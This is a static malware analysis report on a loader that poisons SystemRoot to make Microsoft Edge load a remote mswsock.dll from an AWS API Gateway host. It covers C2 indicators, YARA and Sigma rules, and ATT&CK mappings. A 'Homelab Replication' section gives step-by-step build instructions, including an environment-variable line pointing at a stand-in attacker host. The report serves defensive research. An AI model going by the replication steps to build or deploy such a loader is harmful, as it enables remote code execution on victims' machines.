f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283unattributed: f8ab87be57e4 — MSVC 14.43 SystemRoot-poison Edge DLL-hijack loader
Executive Summary
A freshly compiled (May 26 2026) MSVC 14.43 x64 console PE that hijacks Microsoft Edge’s DLL search order by poisoning SystemRoot to point to an attacker-controlled AWS API Gateway endpoint. Edge is then launched with a decoy PDF URL; when it initializes Winsock, it loads mswsock.dll from the poisoned %SystemRoot%\system32\ path. The result is a signed Microsoft process executing attacker-supplied code over HTTPS/WebDAV without ever touching disk with a malicious DLL. French-language logging strings suggest a francophone actor or target set. Static-only analysis; no CAPE detonation available.
What It Is
- SHA-256:
f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283 - Size: 140 288 bytes (140 KB)
- Format: PE32+ executable (console) x86-64, 5 sections ^[file.txt]
- Compiler: MSVC 14.43 (Visual Studio 2022) — LinkerVersion 14.43,
IMAGE_DEBUG_TYPE_POGOpresent ^[exiftool.json] ^[pefile.txt] - Compiled: Tue May 26 21:02:23 2026 UTC ^[pefile.txt]
- Packed / obfuscated: No. No packing detected; standard MSVC CRT startup. Entropy 6.50 on
.text, 4.96 on.rdata. ^[pefile.txt] - Signed: No. Checksum 0x0, no security directory. ^[pefile.txt]
- Anti-analysis: None observed. Only
IsDebuggerPresentimported via CRT (not called explicitly in main). No VM checks, no timing gates. ^[pefile.txt] - YARA: Generic
PE_File_Genericonly. ^[yara.txt] - CAPE: Skipped — no Windows guest available. ^[dynamic-analysis.md]
How It Works
The binary performs a four-stage setup:
- Environment poisoning — Calls
SetEnvironmentVariableWfour times to overwriteSystemRoot,SYSTEMROOT,windir, andWINDIRwith the same attacker-controlled UNC path:\\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\cv^[r2:main] - Validation — Retrieves the real
SystemRootviaGetEnvironmentVariableWand prints it to console (likely a debug artefact). Also expands%SystemRoot%\system32\mswsock.dllviaExpandEnvironmentStringsWto confirm the poisoned path resolves correctly. ^[r2:main] - Edge discovery — Checks
GetFileAttributesWon the two standard Edge install paths (C:\Program Files (x86)\…\msedge.exeandC:\Program Files\…\msedge.exe). Exits with French error message if absent. ^[r2:main] - Edge launch — Creates
%TEMP%\edge_sideloadas the user-data directory, builds a command line with--no-first-run --no-default-browser-check --user-data-dir="%TEMP%\edge_sideload" --new-window https://pdfobject.com/pdf/sample.pdf, and spawns Edge viaCreateProcessW. ^[r2:main]
When Edge starts and initializes its network stack, the Winsock loader searches for mswsock.dll using the standard DLL search order. Because %SystemRoot% now resolves to the attacker’s AWS API Gateway, the search hits %SystemRoot%\system32\mswsock.dll — which the attacker can serve as a malicious DLL. Edge, a signed Microsoft binary, loads and executes it in-process. This is a living-off-the-land DLL search-order hijack where the only malicious file touching disk is the 140 KB stager itself.
The decoy URL (pdfobject.com/pdf/sample.pdf) is a benign PDF hosting service, giving the victim the appearance of a normal document viewer launching.
Decompiled Behavior
Radare2 analysis recovered 527 functions. The relevant ones:
entry0@0x140001720— Standard MSVC CRT startup (__scrt_common_main_seh), performs cookie/CFG init, then callsmain. ^[r2:entry0]main@0x140001070— The entire threat logic lives here. No sub-functions for the payload chain; it is flat and linear.- Lines 0x140001070–0x1400010c0: stack cookie setup, then four
SetEnvironmentVariableWcalls poisoningSystemRoot/SYSTEMROOT/windir/WINDIR. - Lines 0x1400010d0–0x140001130:
GetEnvironmentVariableW("SystemRoot", …)andExpandEnvironmentStringsW("%SystemRoot%\system32\mswsock.dll", …). - Lines 0x140001140–0x1400011b0:
GetFileAttributesWloop over the two Edge paths. - Lines 0x1400011c0–0x1400012e0:
ExpandEnvironmentStringsWfor%TEMP%\edge_sideload, string format the command line,CreateProcessW. - Lines 0x1400012f0–0x140001330:
CloseHandleon process/thread handles, French-language success/failure prints. ^[r2:main]
- Lines 0x140001070–0x1400010c0: stack cookie setup, then four
fcn.140001360— A thinprintfwrapper (calls__stdio_common_vfprintfviaKERNEL32.dll_WriteConsoleW). ^[r2:fcn.140001360]
Control-flow pattern: Entirely linear. No conditional branching except the Edge-existence check. No encryption, no string obfuscation, no dynamic API resolution. The binary is a straightforward “set env vars, launch Edge” launcher.
C2 Infrastructure
| Indicator | Value | Type |
|---|---|---|
| AWS API Gateway | mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com |
UNC/WebDAV staging server |
| Port | 443 (HTTPS) | Used via @SSL@443 UNC syntax |
| Decoy URL | https://pdfobject.com/pdf/sample.pdf |
Benign PDF to mask intent |
| Temp directory | %TEMP%\edge_sideload |
Edge profile staging |
| Target DLL | mswsock.dll |
Winsock service provider hijacked via search order |
The @SSL@443 syntax in a UNC path tells Windows to negotiate an encrypted WebDAV/SMB-over-HTTPS tunnel to the endpoint. This means the malicious mswsock.dll payload is fetched over TLS, reducing network detection surface. ^[r2:main]
Interesting Tidbits
- French-language logging. All user-facing strings are in French: “msedge.exe introuvable sur le poste”, “Lancement”, “Edge lance (PID=%lu)”. This suggests either a francophone actor or a campaign targeting French-speaking victims. ^[strings.txt:1]
- Debug build artefacts. The binary contains
IMAGE_DEBUG_TYPE_POGO(Profile-Guided Optimization) debug info and full CRT unwind data. It was not stripped. ^[pefile.txt] - Standard section names, standard linker. No tricks in the PE layout —
.text,.rdata,.data,.pdata,.relocall with normal characteristics. The only anomaly is the complete absence of.rsrc(no icons, no version info, no manifest). ^[pefile.txt] - No network imports in the stager. The stager itself imports only
KERNEL32.dll. All network activity is delegated to Edge and the Windows DLL loader, making the binary itself appear harmless to static network-import heuristics. ^[pefile.txt] - AWS API Gateway as C2. Using a serverless API Gateway endpoint (eu-west-3 / Paris region) provides the actor with automatic TLS, no persistent server infrastructure, and easy rotation. The
/cvsuffix in the UNC path may be a campaign identifier. - May 2026 build date. Less than three months old at time of analysis — actively maintained tooling or a very recent campaign.
How To Mess With It (Homelab Replication)
Goal: Reproduce a SystemRoot-poison DLL-hijack loader that causes a signed binary to load a remote DLL.
Toolchain: Visual Studio 2022 (v17.x), C++, x64 Release with PGO (optional).
Steps:
- Create a new C++ Console project in VS 2022.
- Use
SetEnvironmentVariableW(L"SystemRoot", L"\\\\attacker.example.com@SSL@443\\share")before spawning the target process. - Build command-line arguments for
msedge.exewith--user-data-dirpointing to a temp folder. - Call
CreateProcessWto launch Edge. - Host a test
mswsock.dll(any compiled DLL withDllMainthat logs or pops calc) on a WebDAV/HTTPS server at/cv/system32/mswsock.dll. - Verify: Edge starts, and ProcMon shows it attempting to load
mswsock.dllfrom\attacker.example.com@SSL@443\cv\system32\mswsock.dll.
What you learn: This demonstrates how trivial environment-variable manipulation can subvert DLL search order in a signed Microsoft process, bypassing many application-control policies that trust Edge.
Deployable Signatures
YARA rule
rule Unclassified_MSVC_SystemRoot_Poison_Edge_Loader
{
meta:
description = "MSVC x64 console PE that poisons SystemRoot to hijack Edge DLL loading"
author = "PacketPursuit"
date = "2026-08-09"
sha256 = "f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283"
strings:
$api1 = "SetEnvironmentVariableW" wide ascii
$api2 = "GetEnvironmentVariableW" wide ascii
$api3 = "ExpandEnvironmentStringsW" wide ascii
$api4 = "CreateProcessW" wide ascii
$edge1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" wide
$edge2 = "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" wide
$sys1 = "SystemRoot" wide
$sys2 = "SYSTEMROOT" wide
$sys3 = "windir" wide
$sys4 = "WINDIR" wide
$decoy = "https://pdfobject.com/pdf/sample.pdf" wide
$cmd = "--no-first-run --no-default-browser-check --user-data-dir=" wide
condition:
uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x4550 and
uint16(uint32(0x3C)+0x18) == 0x20B and
$api1 and $api2 and $api3 and $api4 and
($edge1 or $edge2) and
($sys1 or $sys2 or $sys3 or $sys4) and
($decoy or $cmd)
}
Sigma rule
title: SystemRoot Poison Edge Launcher
logsource:
category: process_creation
product: windows
detection:
selection_env:
CommandLine|contains:
- 'SetEnvironmentVariableW'
selection_edge:
CommandLine|contains:
- 'msedge.exe'
- '--user-data-dir'
- '--no-first-run'
selection_unc:
CommandLine|contains:
- 'execute-api'
- '@SSL@'
condition: selection_edge and selection_unc
falsepositives:
- Unlikely in legitimate software
level: high
IOC list
| Type | Value |
|---|---|
| SHA-256 | f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283 |
| SSDeep | 1536:61hbuy/2oUe3kliCgSbwd+8QhL99yyvhySbQeHcr+CUisCqtUlbmFNo1GtksWrC8:s1nDAL/T1bQe8rXsMlbmHWuwommTQK |
| TLSH | 44D37C1BB3E531F8E5778238C4514A46E7B3B87147219B6F03E446A62F636D09E3EB21 |
| AWS API Gateway | mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com |
| Decoy URL | https://pdfobject.com/pdf/sample.pdf |
| Env vars poisoned | SystemRoot, SYSTEMROOT, windir, WINDIR |
| Temp dir created | %TEMP%\edge_sideload |
| French strings | msedge.exe introuvable sur le poste, Lancement, Edge lance |
| Target DLL | mswsock.dll (loaded from poisoned %SystemRoot%\system32\) |
Behavioral fingerprint statement
This binary is a 140 KB MSVC 14.43 x64 console executable with no exports, no .rsrc section, and only KERNEL32.dll imports. On launch it overwrites the four standard Windows root-directory environment variables (SystemRoot, SYSTEMROOT, windir, WINDIR) with an attacker-controlled UNC path pointing to an AWS API Gateway endpoint. It then verifies the presence of msedge.exe in either Program Files location, expands %TEMP%\edge_sideload, and spawns Edge with --no-first-run --no-default-browser-check --user-data-dir and a decoy PDF URL. The intent is to force Edge — a signed Microsoft binary — to load mswsock.dll from the poisoned UNC path when it initializes Winsock, executing attacker-controlled code inside a trusted process context.
Detection Signatures
No capa output available (signature path error). Manual ATT&CK mapping based on decompiled behavior:
| ATT&CK ID | Technique | Evidence |
|---|---|---|
| T1574.001 | DLL Search Order Hijacking | Poisoning SystemRoot to redirect mswsock.dll load ^[r2:main] |
| T1059 | Command and Scripting Interpreter | Spawns Edge with crafted command-line args ^[r2:main] |
| T1204.002 | User Execution: Malicious File | Victim executes the stager PE ^[file.txt] |
| T1071.001 | Application Layer Protocol: Web Protocols | AWS API Gateway over HTTPS/WebDAV for DLL staging ^[r2:main] |
| T1105 | Ingress Tool Transfer | Remote mswsock.dll fetched over UNC/WebDAV at runtime ^[r2:main] |
References
- SHA-256:
f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283 - Source: OpenCTI / MalwareBazaar
- Wiki pages: unattributed, systemroot-poison-dll-hijack
Provenance
file.txt— file(1) outputexiftool.json— ExifTool 12.76 PE metadatapefile.txt— pefile.py full PE dumpstrings.txt— GNU strings outputrabin2-info.txt/ radare2 decompilation — radare2 5.x analysis (main,entry0,fcn.140001360)binwalk.txt— Binwalk 2.3.4 (no embedded archives)capa.txt— capa failed (missing signatures)floss.txt— floss failed (argument parsing error)dynamic-analysis.md— CAPE skipped (no Windows guest)